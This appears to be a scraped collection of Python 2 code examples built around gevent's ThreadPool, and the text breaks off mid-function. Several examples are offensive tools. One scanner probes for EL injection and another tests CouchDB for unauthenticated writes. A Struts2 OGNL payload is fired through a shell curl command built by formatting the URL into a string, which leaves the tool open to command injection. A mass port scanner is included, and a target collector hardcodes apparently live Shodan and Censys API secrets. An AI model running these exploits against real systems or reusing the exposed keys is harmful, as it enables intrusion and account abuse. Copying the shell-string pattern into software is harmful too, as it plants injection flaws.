Example #1
# Required imports (inferred from usage):
import json
import logging
import re
import traceback

import requests
from gevent.threadpool import ThreadPool


class ELExpression(object):
    def __init__(self):
        self.result = []
        self.pool = ThreadPool(10)
        self.q = []
        # ${1000-121} evaluates to 879 if the server evaluates EL expressions
        self.payload = '${1000-121}'
        self.match = '879'

    def putinqueue(self, info):
        try:
            url, data = info
            current = data if data else url
            # replace each parameter value (key=value) with the payload
            for k in re.finditer(r'\=(?P<value>.*?)(?:$|&)', current):
                value = k.group('value')
                payload = current.replace(value, self.payload)
                if data:
                    self.q.append((url, payload))
                else:
                    self.q.append((payload, data))
        except:
            traceback.print_exc()

    def Fuzz(self, info):
        try:
            url, data = info
            if data:
                try:
                    r = requests.post(url, data=data, timeout=10, verify=False)
                    content = r.content
                except:
                    content = ''
            else:
                try:
                    print "Req ::" + url
                    r = requests.get(url, timeout=10, verify=False)
                    content = r.content
                except:
                    content = ''
            # check the response for the evaluated expression, for both POST and GET targets
            if self.match in content:
                logging.info('found vulnerable url: %s' % url)
                self.result.append(info)
        except:
            traceback.print_exc()

    def Scan(self, info):
        try:
            if isinstance(info, tuple):
                self.putinqueue(info)
            else:
                # info is a path to a JSON file of (url, data) pairs
                with open(info) as f:
                    ud = json.loads(f.read())
                for i in ud:
                    self.putinqueue(i)
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
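
A minimal usage sketch (the URL and the (url, data) tuple are hypothetical; Scan also accepts a path to a JSON file of such pairs):

if __name__ == '__main__':
    scanner = ELExpression()
    # a GET target: data is None, so the URL query parameters get fuzzed
    scanner.Scan(('http://example.com/page?id=1&name=test', None))
    print scanner.result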
Example #2
def easy_parallelize_gevent(f, sequence):
    # Lazily create a shared gevent ThreadPool and cache it in the
    # module-level PARALLEL_STRUCTURES dict (defined elsewhere in the module).
    if "gevent_pool" not in PARALLEL_STRUCTURES:
        from gevent.threadpool import ThreadPool
        pool = ThreadPool(30000)
        PARALLEL_STRUCTURES["gevent_pool"] = pool
    pool = PARALLEL_STRUCTURES["gevent_pool"]
    result = pool.map(f, sequence)
    return result
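
A short usage sketch, assuming PARALLEL_STRUCTURES is an ordinary module-level dict:

PARALLEL_STRUCTURES = {}

def square(x):
    return x * x

print easy_parallelize_gevent(square, range(10))  # [0, 1, 4, ..., 81]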
Example #3
# Required imports (inferred from usage):
import json
import random
import traceback
import urlparse

import requests
from gevent.threadpool import ThreadPool


class CouchDb(object):
    def __init__(self):
        self.pool = ThreadPool(10)
        self.result = []
        self.port = "5984"
        self.q = []
        self.randomstrs = ['a', 'k', 'b', 'v', 'd', 'f', 'e', 'g']
        self.path = '_utils/index.html'

    def Fuzz(self, info):
        try:
            url = info[0]
            port = info[1]
            host = urlparse.urlparse(url).netloc
            url = r'http://' + host + ":" + port
            rstr = "".join(random.sample(self.randomstrs, 5))
            url = url + r'/' + rstr
            try:
                print "Req::" + url
                r = requests.put(url, timeout=10)
                # a successful unauthenticated PUT returns {"ok":true}
                if 'ok' in r.content and 'true' in r.content:
                    self.result.append(info)
            except:
                pass
        except:
            pass

    def Scan(self, info):
        try:
            if isinstance(info, tuple):
                self.q.append(info)
            else:
                with open(info) as f:
                    content = json.loads(f.read())
                    for i in content:
                        self.q.append((i['url'], self.port))
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
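
A minimal usage sketch (the target tuple is hypothetical; Scan also accepts a JSON file of {'url': ...} records):

if __name__ == '__main__':
    scanner = CouchDb()
    scanner.Scan(('http://example.com/', '5984'))
    print scanner.result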
Example #4
# Required imports (inferred from usage):
import os
import re
import traceback

from gevent.threadpool import ThreadPool


class st2bypass(object):
    def __init__(self):
        self.result = []
        self.pool = ThreadPool(10)
        self.q = []

    def action(self, info):
        try:
            if '.do' in info or '.action' in info:
                url = info.split('?')[0]
                self.q.append(url)
        except:
            traceback.print_exc()

    def Fuzz(self, url):
        try:
            cmd = '''curl -i "%s" -F 'redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}=-1' ''' % url
            print cmd
            output = os.popen(cmd).read()
            for i in re.finditer(r'\:\/\/.*\/\/(?P<path>.*?)/;', output):
                path = i.group('path')
                if path:
                    self.result.append(path)
        except:
            traceback.print_exc()

    def Scan(self, info):
        try:
            if isinstance(info, str):
                self.action(info)
            else:
                for i in info:
                    self.action(i['url'])
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
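
A minimal usage sketch (the endpoint is hypothetical; Scan also accepts an iterable of {'url': ...} records):

if __name__ == '__main__':
    scanner = st2bypass()
    scanner.Scan('http://example.com/login.action?from=index')
    print scanner.result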
Example #5
# Required imports (inferred from usage):
import csv
import os
import re
import sys
import uuid
import HTMLParser
from collections import defaultdict
from time import time, sleep

import requests
from requests.adapters import HTTPAdapter
from gevent.threadpool import ThreadPool
from libnmap.parser import NmapParser
from libnmap.process import NmapProcess


class Scanner(object):
    def __init__(self, filename='ips.txt'):
        self.W = '\033[0m'
        self.G = '\033[1;32m'
        self.O = '\033[1;33m'
        self.R = '\033[1;31m'
        self.time = time()
        self.result = []
        self.ips = filename
        self.pool = ThreadPool(30)
        self.output_mode = "silent"  # debug or silent
        self.masscan_ports_max = 500
        self.masscan_ports = '0-65535'
        self.masscan_rate = 1000
        self.default_policy = '-sS -sV -O -Pn --open --script=banner --script-timeout=7200 --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36"'
        self.nmap_timeout = 3600
        self.headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Connection": "close",
        }
        self.patterns = (
            '<meta[\s]*http-equiv[\s]*=[\s]*[\'"]refresh[\'"][\s]*content[\s]*=[\s]*[\'"]\d+[\s]*;[\s]*url[\s]*=[\s]*(.*?)[\'"][\s]*/?>',
            'window.location[\s]*=[\s]*[\'"](.*?)[\'"][\s]*;',
            'window.location.href[\s]*=[\s]*[\'"](.*?)[\'"][\s]*;',
            'window.location.replace[\s]*\([\'"](.*?)[\'"]\)[\s]*;',
            'window.navigate[\s]*\([\'"](.*?)[\'"]\)',
            'location.href[\s]*=[\s]*[\'"](.*?)[\'"]',
        )
        self.default_top1000 = [
            1, 3, 4, 6, 7, 9, 11, 13, 17, 19, 20, 21, 22, 23, 24, 25, 26, 30,
            32, 33, 37, 42, 43, 49, 53, 67, 69, 70, 79, 80, 81, 82, 83, 84, 85,
            88, 89, 90, 99, 100, 102, 104, 106, 109, 110, 111, 113, 119, 123,
            125, 135, 137, 138, 139, 143, 144, 146, 161, 162, 163, 175, 179,
            199, 211, 212, 222, 254, 255, 256, 259, 264, 280, 301, 306, 311,
            340, 366, 389, 391, 406, 407, 416, 417, 425, 427, 443, 444, 445,
            459, 464, 465, 481, 497, 500, 502, 503, 512, 513, 514, 515, 520,
            523, 524, 541, 543, 544, 545, 548, 554, 555, 563, 564, 587, 593,
            616, 617, 623, 625, 626, 631, 636, 646, 648, 666, 667, 668, 683,
            687, 691, 700, 705, 711, 714, 720, 722, 726, 749, 765, 771, 777,
            783, 787, 789, 800, 801, 808, 843, 873, 880, 888, 898, 900, 901,
            902, 903, 911, 912, 981, 987, 990, 992, 993, 995, 999, 1000, 1001,
            1002, 1007, 1009, 1010, 1011, 1021, 1022, 1023, 1024, 1025, 1026,
            1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037,
            1038, 1039, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048,
            1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059,
            1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070,
            1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081,
            1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092,
            1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1102, 1104, 1105,
            1106, 1107, 1108, 1110, 1111, 1112, 1113, 1114, 1117, 1119, 1121,
            1122, 1123, 1124, 1126, 1130, 1131, 1132, 1137, 1138, 1141, 1145,
            1147, 1148, 1149, 1151, 1152, 1154, 1163, 1164, 1165, 1166, 1169,
            1174, 1175, 1177, 1183, 1185, 1186, 1187, 1192, 1194, 1198, 1199,
            1200, 1201, 1213, 1216, 1217, 1218, 1233, 1234, 1236, 1241, 1244,
            1247, 1248, 1259, 1260, 1271, 1272, 1277, 1287, 1296, 1300, 1301,
            1309, 1310, 1311, 1322, 1328, 1334, 1344, 1352, 1417, 1433, 1434,
            1443, 1455, 1461, 1471, 1494, 1500, 1501, 1503, 1521, 1524, 1533,
            1556, 1580, 1583, 1594, 1600, 1604, 1641, 1645, 1658, 1666, 1687,
            1688, 1700, 1701, 1717, 1718, 1719, 1720, 1721, 1723, 1755, 1761,
            1782, 1783, 1801, 1805, 1812, 1839, 1840, 1862, 1863, 1864, 1875,
            1883, 1900, 1911, 1914, 1935, 1947, 1962, 1967, 1971, 1972, 1974,
            1984, 1991, 1993, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
            2006, 2007, 2008, 2009, 2010, 2013, 2020, 2021, 2022, 2030, 2033,
            2034, 2035, 2038, 2040, 2041, 2042, 2043, 2045, 2046, 2047, 2048,
            2049, 2065, 2068, 2080, 2082, 2083, 2086, 2087, 2094, 2099, 2100,
            2103, 2105, 2106, 2107, 2111, 2119, 2121, 2123, 2126, 2135, 2144,
            2152, 2160, 2161, 2170, 2179, 2181, 2190, 2191, 2196, 2200, 2222,
            2251, 2260, 2288, 2301, 2323, 2332, 2366, 2375, 2376, 2379, 2381,
            2382, 2383, 2393, 2394, 2399, 2401, 2404, 2424, 2425, 2427, 2455,
            2480, 2492, 2500, 2501, 2522, 2525, 2557, 2601, 2602, 2604, 2605,
            2607, 2608, 2628, 2638, 2701, 2702, 2710, 2717, 2718, 2725, 2800,
            2809, 2811, 2869, 2875, 2909, 2910, 2920, 2967, 2968, 2998, 3000,
            3001, 3003, 3005, 3006, 3007, 3011, 3013, 3017, 3030, 3031, 3050,
            3052, 3071, 3077, 3128, 3168, 3211, 3221, 3260, 3261, 3268, 3269,
            3283, 3288, 3299, 3300, 3301, 3306, 3307, 3310, 3322, 3323, 3324,
            3325, 3333, 3351, 3367, 3369, 3370, 3371, 3372, 3388, 3389, 3390,
            3404, 3460, 3476, 3493, 3517, 3527, 3541, 3542, 3546, 3551, 3580,
            3659, 3671, 3689, 3690, 3702, 3703, 3737, 3749, 3766, 3780, 3784,
            3800, 3801, 3809, 3814, 3826, 3827, 3828, 3851, 3869, 3871, 3878,
            3880, 3889, 3905, 3914, 3918, 3920, 3945, 3971, 3986, 3995, 3998,
            4000, 4001, 4002, 4003, 4004, 4005, 4006, 4022, 4040, 4045, 4063,
            4064, 4070, 4111, 4125, 4126, 4129, 4224, 4242, 4279, 4321, 4343,
            4369, 4433, 4443, 4444, 4445, 4446, 4449, 4550, 4567, 4662, 4712,
            4730, 4786, 4800, 4840, 4848, 4880, 4899, 4900, 4911, 4949, 4998,
            5000, 5001, 5002, 5003, 5004, 5006, 5007, 5009, 5030, 5033, 5050,
            5051, 5054, 5060, 5061, 5080, 5087, 5093, 5094, 5100, 5101, 5102,
            5120, 5190, 5200, 5214, 5221, 5222, 5225, 5226, 5269, 5280, 5298,
            5351, 5353, 5357, 5400, 5405, 5414, 5431, 5432, 5433, 5440, 5500,
            5510, 5544, 5550, 5554, 5555, 5560, 5566, 5577, 5601, 5631, 5632,
            5633, 5666, 5672, 5678, 5679, 5683, 5718, 5730, 5800, 5801, 5802,
            5810, 5811, 5815, 5822, 5825, 5850, 5859, 5862, 5877, 5900, 5901,
            5902, 5903, 5904, 5906, 5907, 5910, 5911, 5915, 5922, 5925, 5938,
            5950, 5952, 5959, 5960, 5961, 5962, 5963, 5984, 5985, 5986, 5987,
            5988, 5989, 5998, 5999, 6000, 6001, 6002, 6003, 6004, 6005, 6007,
            6009, 6025, 6059, 6082, 6100, 6101, 6106, 6112, 6123, 6129, 6156,
            6346, 6379, 6389, 6488, 6502, 6510, 6543, 6547, 6565, 6566, 6567,
            6580, 6646, 6664, 6665, 6666, 6667, 6668, 6669, 6689, 6692, 6699,
            6779, 6788, 6789, 6792, 6839, 6881, 6901, 6969, 7000, 7001, 7002,
            7004, 7007, 7019, 7025, 7070, 7071, 7077, 7100, 7103, 7106, 7200,
            7201, 7288, 7402, 7435, 7443, 7474, 7496, 7512, 7547, 7548, 7625,
            7627, 7634, 7676, 7741, 7777, 7778, 7779, 7800, 7911, 7920, 7921,
            7937, 7938, 7999, 8000, 8001, 8002, 8007, 8008, 8009, 8010, 8011,
            8021, 8022, 8023, 8031, 8042, 8045, 8060, 8069, 8080, 8081, 8082,
            8083, 8084, 8085, 8086, 8087, 8088, 8089, 8090, 8093, 8098, 8099,
            8100, 8112, 8125, 8126, 8139, 8161, 8180, 8181, 8192, 8193, 8194,
            8200, 8222, 8254, 8290, 8291, 8292, 8300, 8333, 8334, 8377, 8378,
            8383, 8400, 8402, 8443, 8471, 8500, 8545, 8554, 8600, 8649, 8651,
            8652, 8654, 8686, 8701, 8800, 8834, 8873, 8880, 8883, 8888, 8889,
            8899, 8994, 9000, 9001, 9002, 9003, 9009, 9010, 9011, 9040, 9042,
            9050, 9051, 9071, 9080, 9081, 9090, 9091, 9099, 9100, 9101, 9102,
            9103, 9110, 9111, 9151, 9160, 9191, 9200, 9207, 9220, 9290, 9300,
            9333, 9415, 9418, 9443, 9471, 9485, 9500, 9502, 9503, 9535, 9575,
            9593, 9594, 9595, 9600, 9618, 9653, 9666, 9700, 9711, 9876, 9877,
            9878, 9898, 9900, 9917, 9929, 9943, 9944, 9968, 9981, 9998, 9999,
            10000, 10001, 10002, 10003, 10004, 10009, 10010, 10012, 10024,
            10025, 10082, 10162, 10180, 10215, 10243, 10333, 10566, 10616,
            10617, 10621, 10626, 10628, 10629, 10778, 11001, 11110, 11111,
            11211, 11300, 11310, 11967, 12000, 12174, 12265, 12345, 13456,
            13579, 13722, 13782, 13783, 14000, 14147, 14238, 14265, 14441,
            14442, 15000, 15002, 15003, 15004, 15660, 15672, 15742, 16000,
            16001, 16010, 16012, 16016, 16018, 16080, 16113, 16992, 16993,
            17185, 17877, 17988, 18001, 18040, 18081, 18101, 18245, 18988,
            19101, 19283, 19315, 19350, 19780, 19801, 19842, 19888, 20000,
            20005, 20031, 20221, 20222, 20547, 20828, 21571, 22105, 22222,
            22939, 23023, 23424, 23502, 24444, 24800, 25105, 25565, 25734,
            25735, 26214, 27000, 27015, 27017, 27019, 27080, 27352, 27353,
            27355, 27356, 27715, 28017, 28201, 28784, 30000, 30310, 30311,
            30312, 30313, 30718, 30951, 31038, 31337, 32400, 32768, 32769,
            32770, 32771, 32772, 32773, 32774, 32775, 32776, 32777, 32778,
            32779, 32780, 32781, 32782, 32783, 32784, 32785, 33338, 33354,
            33899, 34571, 34572, 34573, 34962, 34964, 35500, 37777, 38292,
            40193, 40911, 41511, 42510, 44176, 44442, 44443, 44501, 44818,
            45100, 45554, 47808, 48080, 48899, 49151, 49152, 49153, 49154,
            49155, 49156, 49157, 49158, 49159, 49160, 49161, 49163, 49165,
            49167, 49175, 49176, 49400, 49999, 50000, 50001, 50002, 50003,
            50006, 50050, 50070, 50090, 50100, 50300, 50389, 50500, 50636,
            50800, 51103, 51106, 51493, 52673, 52822, 52848, 52869, 54045,
            54328, 55055, 55056, 55553, 55555, 55600, 56737, 56738, 57294,
            57797, 58080, 59110, 60020, 60443, 61532, 61613, 61616, 61900,
            62078, 63331, 64623, 64680, 64738, 65000, 65129, 65389
        ]

    def targetsByFile(self):
        targets = []
        try:
            with open(self.ips) as fr:
                for ip in fr.readlines():
                    targets.append(ip.strip())
        except Exception as e:
            print self.R + u'\n[x] file does not exist...' + self.W
        return targets

    def scanByMasscan(self, target):
        report_dict = defaultdict(list)
        tmp_file = '{}.xml'.format(uuid.uuid4())
        try:
            cmd = 'masscan {} -p {} -oX {} --rate {} --wait 1 >> /dev/null 2>&1'.format(target, self.masscan_ports,
                                                                                        tmp_file, self.masscan_rate) \
                if self.output_mode == "silent" else 'masscan {} -p {} -oX {} --rate {} --wait 1'.format(
                target, self.masscan_ports, tmp_file, self.masscan_rate)
            os.system(cmd)
            if os.path.exists(tmp_file) and os.path.getsize(tmp_file):
                report = NmapParser.parse_fromfile(tmp_file)
                for host in report.hosts:
                    for service in host.services:
                        report_dict[host.ipv4].append(service.port)
        except Exception as e:
            print e
        finally:
            if os.path.exists(tmp_file):
                os.remove(tmp_file)
            return report_dict

    def scanByNmap(self, target, policy):
        runtime = 0
        try:
            nmap_proc = NmapProcess(targets=target,
                                    options=policy,
                                    safe_mode=True)
            nmap_proc.run_background()
            while nmap_proc.is_running():
                if runtime >= self.nmap_timeout:
                    nmap_proc.stop()
                    if self.output_mode != "silent":
                        print self.R + u'\n[x] scan_host {} timeout...'.format(
                            target) + self.W
                    break
                else:
                    if self.output_mode != "silent":
                        sys.stdout.write(
                            u'\033[1;34m[~] scan_host is {},scan progress is {}%({} sec)\n\033[0m'
                            .format(target, nmap_proc.progress, runtime))
                        sys.stdout.flush()
                    sleep(5)
                    runtime += 5
            if nmap_proc.is_successful() and nmap_proc.stdout:
                self.parserReport(nmap_proc.stdout)
        except Exception as e:
            print e

    def parserTitle(self, url):
        def html_decoder(html_entries):
            try:
                hp = HTMLParser.HTMLParser()
                return hp.unescape(html_entries)
            except:
                return html_entries

        def match_title(content):
            title = re.findall("document\.title[\s]*=[\s]*['\"](.*?)['\"]",
                               content, re.I | re.M | re.S)
            if title and len(title) >= 1:
                return title[0]
            else:
                title = re.findall('<title.*?>(.*?)</title>', content,
                                   re.I | re.M | re.S)
                if title and len(title) >= 1:
                    return title[0]
                else:
                    return ""

        def page_decode(html_content):
            raw_content = html_content
            try:
                html_content = raw_content.decode('utf-8')
            except UnicodeError:
                try:
                    html_content = raw_content.decode('gbk')
                except UnicodeError:
                    try:
                        html_content = raw_content.decode('gb2312')
                    except UnicodeError:
                        try:
                            html_content = raw_content.decode('big5')
                        except:
                            pass
            return html_content

        html_content = ''
        title = ''
        if '://' not in url:
            url = 'http://' + url.strip()
        url = url.rstrip('/') + '/'
        try:
            try:
                s = requests.Session()
                s.mount('http://', HTTPAdapter(max_retries=1))
                s.mount('https://', HTTPAdapter(max_retries=1))
                req = s.get(url,
                            headers=self.headers,
                            verify=False,
                            allow_redirects=True,
                            timeout=15)
                html_content = req.content
                html_content = page_decode(html_content)
                req.close()
            except:
                pass
            title = match_title(html_content) if html_content else ''
            try:
                if title:
                    # decode HTML numeric character references (e.g. &#27979;)
                    if re.findall(r'&#\d{3,};', title):
                        title = html_decoder(title)
            except:
                pass
            for pattern in self.patterns:
                jump = re.findall(pattern, html_content, re.I | re.M)
                if len(jump) == 1:
                    if "://" in jump[0]:
                        url = jump[0]
                    else:
                        url += jump[0]
                    break
            try:
                s = requests.Session()
                s.mount('http://', HTTPAdapter(max_retries=1))
                s.mount('https://', HTTPAdapter(max_retries=1))
                req = s.get(url,
                            headers=self.headers,
                            verify=False,
                            timeout=15)
                html_content = req.content
                req.close()
            except:
                pass
            html_content = page_decode(html_content)
            title = match_title(html_content) if html_content else ""
            try:
                if title:
                    if re.findall("[$#]\d{3,};", title):
                        title = html_decoder(title)
            except:
                pass
        except:
            pass
        finally:
            if title and len(title) > 255:
                title = title[:250]
            return title

    def parserReport(self, report):
        try:
            parsed = NmapParser.parse(report)
            for host in parsed.hosts:
                for services in host.services:
                    if ("http" in services.service) or ("ssl"
                                                        in services.service):
                        url = "https://" + host.ipv4 + ":" + str(
                            services.port) if ('ssl' in services.service) or (
                                'https' in services.service
                            ) else "http://" + host.ipv4 + ":" + str(
                                services.port)
                        title = self.parserTitle(url)
                        self.result.append(
                            (host.ipv4, services.port, services.protocol,
                             services.state, services.service, services.banner,
                             title))
                        print u'{}[+] scan_host is {},scan result is {}|{}|{}|{}|{}|{}{}'.format(
                            self.G, host.ipv4, services.port,
                            services.protocol, services.state,
                            services.service, services.banner, title, self.W)
        except Exception as e:
            print e

    def scanMasscanToNmap(self, target):
        try:
            ip_port_list = self.scanByMasscan(target)
            if ip_port_list:
                for target, ports in ip_port_list.items():
                    if len(ports) < self.masscan_ports_max:
                        policy = self.default_policy + " -p {}".format(
                            ','.join(
                                map(str, list(
                                    set(self.default_top1000 + ports)))))
                        self.scanByNmap(str(target), policy)
                    else:
                        if self.output_mode != "silent":
                            print self.R + u'\n[x] scan_host {} maybe honeypot or network reasons...'.format(
                                target) + self.W
            else:
                if self.output_mode != "silent":
                    print self.R + u'\n[x] scan_host {} not found live ports...'.format(
                        target) + self.W
        except Exception as e:
            print e

    def main(self):
        try:
            print '\033[1;37m[*] Console starting({} mode), please wait...\033[0m'.format(
                self.output_mode)
            self.pool.map(self.scanMasscanToNmap, self.targetsByFile())
            self.pool.join()
            if self.result:
                csvfile = open('result.csv', 'wb')
                csvfile.write(u'\ufeff'.encode('utf8'))
                writer = csv.writer(csvfile)
                writer.writerow([
                    'Address', 'Port', 'Protocol', 'State', 'Service',
                    'Banner', 'Title'
                ])
                writer.writerows(self.result)
                csvfile.close()
            print u'{}[✓] scan completion time : {} sec.{}'.format(
                self.O,
                time() - self.time, self.W)
        except Exception as e:
            print e
        except KeyboardInterrupt:
            print self.R + u'\n[x]  user Ctrl+C aborts scan ...' + self.W
            sys.exit(1)
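
A minimal driver sketch (assumes masscan and nmap are installed and ips.txt holds one target per line):

if __name__ == '__main__':
    Scanner(filename='ips.txt').main()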
Example #6
# Required imports (inferred from usage); get_file_info, read_data, _monitor,
# _worker and defaults are module-level helpers not shown in this excerpt.
import os

import gevent
from gevent.threadpool import ThreadPool


def download(url,
             output,
             thread_count=defaults['thread_count'],
             buffer_size=defaults['buffer_size'],
             block_size=defaults['block_size']):
    # get latest file info
    file_info = get_file_info(url)

    # init path
    if output is None:
        output = file_info.name
    workpath = '%s.ing' % output
    infopath = '%s.inf' % output

    # Split the file into blocks. Every block is a list [start, offset, end];
    # each greenlet downloads the file part described by its block and
    # updates the block's offset as it progresses.
    blocks = []

    if os.path.exists(infopath):
        # load blocks
        _x, blocks = read_data(infopath)
        if (_x.url != url or _x.name != file_info.name
                or _x.lastmodified != file_info.lastmodified):
            blocks = []

    if len(blocks) == 0:
        # set blocks
        if block_size > file_info.size:
            blocks = [[0, 0, file_info.size]]
        else:
            block_count, remain = divmod(file_info.size, block_size)
            blocks = [[
                i * block_size, i * block_size, (i + 1) * block_size - 1
            ] for i in range(block_count)]
            blocks[-1][-1] += remain
        # create a new blank workpath (truncating any stale partial file)
        with open(workpath, 'wb') as fobj:
            fobj.write('')

    # start monitor
    monitor = gevent.spawn(_monitor, infopath, file_info, blocks)

    # start downloading
    with open(workpath, 'rb+') as fobj:
        args = [(url, blocks[i], fobj, buffer_size) for i in range(len(blocks))
                if blocks[i][1] < blocks[i][2]]

        if thread_count > len(args):
            thread_count = len(args)

        pool = ThreadPool(thread_count)
        pool.map(_worker, args)
        pool.join()

    monitor.join()

    # rename workpath to output
    if os.path.exists(output):
        os.remove(output)
    os.rename(workpath, output)

    # delete infopath
    if os.path.exists(infopath):
        os.remove(infopath)

    print 'thread_count ', thread_count
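
A hypothetical call (the URL is a placeholder; get_file_info, read_data, _monitor, _worker and defaults must be defined in the surrounding module):

if __name__ == '__main__':
    download('http://example.com/big.iso', 'big.iso',
             thread_count=4, block_size=4 * 1024 * 1024)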
Example #7
# Required imports (inferred from usage); WOOYUN_CONFIRM, WOOYUN_BUG_DETAIL,
# HEADER and POOL_THREADS are module-level constants not shown in this excerpt.
import re

import gevent
import requests
from gevent.threadpool import ThreadPool


class Cloud(object):
    def __init__(self):
        self.pool = ThreadPool(POOL_THREADS)
        self.bugs = []
        self.have_content = True

    def get_one_page(self, page_id):
        print('[*] Crawl Page: {0}'.format(str(page_id)))
        page_url = WOOYUN_CONFIRM + str(page_id)
        while True:
            try:
                req = requests.get(page_url, headers=HEADER, timeout=15)
                if req.status_code == 200:
                    break
            except Exception as e:
                print('[-] Page: {0} Get Error: {1}'.format(
                    str(page_id), str(e)))
        self.analyse_content(req.text)

    def analyse_content(self, content):
        try:
            reg_pattern = '<tr>\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s'
            tmp = re.findall(reg_pattern, content)
            if len(tmp) <= 1:
                self.have_content = False
                return
            for tmp_one in tmp:
                # print(tmp_one)
                bug_info = {}
                reg_pattern = '<th>(.*?)</th>'
                bug_date = re.findall(reg_pattern, tmp_one[1])
                if len(bug_date) > 0:
                    bug_info['date'] = bug_date[0]
                    reg_pattern = '<a href="/bugs/(.*?)">(.*?)</a>'
                    bug_info_tmp = re.findall(reg_pattern, tmp_one[2])
                    bug_info_tmp = bug_info_tmp[0]
                    bug_info['id'] = bug_info_tmp[0]
                    bug_info['name'] = bug_info_tmp[1]
                    self.get_bug_detail(bug_info_tmp[0], bug_info)
                    self.bugs.append(bug_info)
        except Exception as e:
            print('[-] Analyse Error! Detail: {0}'.format(str(e)))

    @staticmethod
    def get_bug_detail(bug_id, bug_info):
        page_url = WOOYUN_BUG_DETAIL + str(bug_id)
        while True:
            try:
                req = requests.get(page_url, headers=HEADER, timeout=15)
                if req.status_code == 200:
                    break
            except Exception as e:
                print('[-] BUG: {0} Get Error: {1}'.format(
                    str(bug_id), str(e)))
        content = req.text
        # "漏洞Rank" is the vulnerability rank field on the detail page
        reg_pattern = '<p class="detail">漏洞Rank:(.*?)</p>'
        bug_info_tmp = re.findall(reg_pattern, content)
        bug_info['rank'] = bug_info_tmp[0].strip()
        # "相关厂商" is the affected-vendor field
        reg_pattern = '<h3 class=\'wybug_corp\'>相关厂商:(.*)\s(.*?)</a>'
        bug_info_tmp = re.findall(reg_pattern, content)
        bug_info['corp'] = bug_info_tmp[0][0].strip() + bug_info_tmp[0][1].strip()

    def start(self):
        i_count = 1
        while self.have_content:
            self.pool.map(self.get_one_page,
                          [x for x in range(i_count, i_count + 50)])
            gevent.wait()
            i_count += 50
        print(self.bugs)
        file_handle = open('wy_no_1.csv', 'w')
        file_handle.write('bug_id, rank, name, corp, date\n')
        for one_bug in self.bugs:
            file_handle.write('{0}, {1}, {2}, {3}, {4}\n'.format(
                one_bug['id'], one_bug['rank'], one_bug['name'],
                one_bug['corp'], one_bug['date']))
            print(one_bug)
        file_handle.close()
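
A minimal usage sketch (assumes WOOYUN_CONFIRM, WOOYUN_BUG_DETAIL, HEADER and POOL_THREADS are defined):

if __name__ == '__main__':
    Cloud().start()  # crawls 50 pages per batch and writes wy_no_1.csv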
Example #8
# Required imports (inferred from usage):
import json
import re
import traceback

import chardet
import fofa
import requests
import shodan
from bs4 import BeautifulSoup
from gevent.threadpool import ThreadPool
from lxml import etree


class TargetCollect(object):
    def __init__(self, info):
        self.pool = ThreadPool(30)
        self.page = 80
        self.headers = {
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent':
            "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate, sdch, br',
            'Accept-Language': 'zh-CN,zh;q=0.8',
        }
        self.urls_result = set()
        self.ips_result = set()
        self.ips_filename = "IP.txt"
        self.urls_filename = "URL.txt"
        self.proxy = {
            'http': 'http://127.0.0.1:1080',
            'https': 'http://127.0.0.1:1080'
        }

        self.shodan_url = "https://api.shodan.io/shodan/host/search?query=apache&key=MM72AkzHXdHpC8iP65VVEEVrJjp7zkgd"
        self.shodan_token = "XHSWncMjN6MEyekECTMcOeoEocl6VO2q"
        self.shodan_keyword = info['shodan']

        self.censys_url = "https://censys.io/api/v1/search/ipv4"
        self.censys_api_id = "9b611dbd-366b-41b1-a50e-1a024004609f"
        self.censys_secret = "wAUW4Ax9uyCkD7JrgS1ItJE5nHQD5DnR"
        self.censys_keyword = info['censys']

        self.fofa_email = "*****@*****.**"
        self.fofa_token = "xxxx"
        self.fofa_keyword = info['fofa']

        self.zoomeye_url = "https://api.zoomeye.org/host/search?page={}&query={}"
        self.zoomeye_user = "******"
        self.zoomeye_pass = "******"
        self.zoomeye_keyword = info['zoomeye']
        self.zoomeye_pool = ThreadPool(10)

        self.baidu_url = "http://www.baidu.com/s?wd={}&pn={}0"
        self._360_url = "https://www.so.com/s?q={}&pn={}&fr=so.com"
        self.google_url = "https://www.google.com/search?q={}&safe=strict&start={}"
        self.keyword = info['b3g']

    def Shodan(self):
        try:
            api = shodan.Shodan(self.shodan_token)
            services = api.search(self.shodan_keyword)
            for service in services['matches']:
                print "[\033[0;39;40mShodan\033[0m] {}".format(
                    service["ip_str"] + ":" + str(service["port"]))
                self.ips_result.add(service["ip_str"] + ":" +
                                    str(service["port"]))
        except:
            print "[\033[0;35;40mShodan\033[0m] Error"
            pass

    def Censys(self):
        try:
            r = requests.post(self.censys_url,
                              auth=(self.censys_api_id, self.censys_secret),
                              json={"query": self.censys_keyword},
                              headers=self.headers,
                              verify=False,
                              timeout=15)
            json_data = r.json()
            for service in json_data["results"]:
                for i in service['protocols']:
                    port = re.sub("\D", "", i)
                    print "[\033[0;31;40mCensys\033[0m] {}".format(
                        service["ip"] + ":" + port)
                    self.ips_result.add(service["ip"] + ":" + port)
        except:
            print "[\033[0;35;40mCensys\033[0m] Error"
            pass

    def Fofa(self, page=2):
        try:
